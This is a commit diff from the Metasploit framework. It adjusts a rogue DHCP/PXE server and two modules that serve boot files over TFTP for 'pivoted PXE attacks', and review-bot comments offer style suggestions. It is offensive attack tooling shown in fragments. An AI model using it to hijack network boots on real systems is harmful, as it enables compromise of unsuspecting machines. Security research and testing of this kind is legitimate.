Fixes #5312 for pivoted PXE attacks.
git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
53e43fa847
commit
06c3dabe31
Binary file not shown.
Binary file not shown.
|
@ -222,6 +222,9 @@ int DHCPserv::run(){
|
|||
string pxeConfigFile("update2");
|
||||
stringOptionCheck(&pxeConfigFile, "PXECONF");
|
||||
|
||||
string pxeAltConfigFile("update0");
|
||||
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
|
||||
|
||||
string pxePathPrefix("");
|
||||
//get DHCP parameters
|
||||
unsigned int leaseTime = 600;
|
||||
|
@ -336,10 +339,6 @@ int DHCPserv::run(){
|
|||
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
|
||||
pkt << DHCPOffer;
|
||||
|
||||
// check if already served based on hw addr (MAC address)
|
||||
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
||||
continue; //Already served; allowing normal boot
|
||||
|
||||
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
|
||||
pkt << DHCPAck;
|
||||
|
||||
|
@ -360,6 +359,11 @@ int DHCPserv::run(){
|
|||
pkt << dhcpoption(OpDns, iton(dnsServer));
|
||||
string pxemagic(PXEMagic,4);
|
||||
pkt << dhcpoption(OpPXEMagic, pxemagic);
|
||||
|
||||
// check if already served based on hw addr (MAC address)
|
||||
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
||||
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
|
||||
else
|
||||
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
|
||||
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
|
||||
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
|
||||
|
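Review bot: The new `if`/`else` that selects the config-file option in the third hunk is unbraced and carries its explanation as a trailing comment on the first branch, so it is easy to misread which branch handles an already-served client. I would brace both branches and move the comment above the `if`, reworded to say that a client already in `served` is sent `pxeAltConfigFile` instead of `pxeConfigFile`. If `serveOnce` is a `bool`, the `== true` is redundant and the condition can read `if (serveOnce && served.count(clienthwaddr) > 0) {`. The defaults `"update2"` and `"update0"` added in the first hunk deserve a one-line comment each saying what the file is, since the Ruby loaders in this commit upload files under those same names. `DHCPserv::run` starts and ends outside these hunks.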
|
|
@ -93,8 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Loading DHCP options...")
|
||||
client.lanattacks.load_dhcp_options(datastore)
|
||||
1.upto(4) do |i|
|
||||
print_status("Loading file #{i} of 4")
|
||||
0.upto(4) do |i|
|
||||
print_status("Loading file #{i+1} of 5")
|
||||
if i < 4
|
||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||
else
|
||||
|
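Review bot: The file count is hard-coded in three places in this hunk (`0.upto(4)`, `"of 5"` and `if i < 4`) and again in the Msf::Post hunk below, so any later change to the file set has to touch every one of them. A single local would keep them in step, for example `file_count = 5` with `0.upto(file_count - 1) do |i|` and `print_status("Loading file #{i+1} of #{file_count}")`. The `else` branch and the end of the loop are outside the hunk, so I cannot see where the fifth file comes from here. The Post module appears to read all five from `TFTPROOT`, and a short comment on why the two modules differ would help the next maintainer.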
|
|
@ -71,8 +71,8 @@ class Metasploit3 < Msf::Post
|
|||
print_status("Loading DHCP options...")
|
||||
client.lanattacks.load_dhcp_options(datastore)
|
||||
|
||||
1.upto(4) do |i|
|
||||
print_status("Loading file #{i} of 4")
|
||||
0.upto(4) do |i|
|
||||
print_status("Loading file #{i+1} of 5")
|
||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||
client.lanattacks.add_tftp_file("update#{i}",contents)
|
||||
end
|
||||
|
|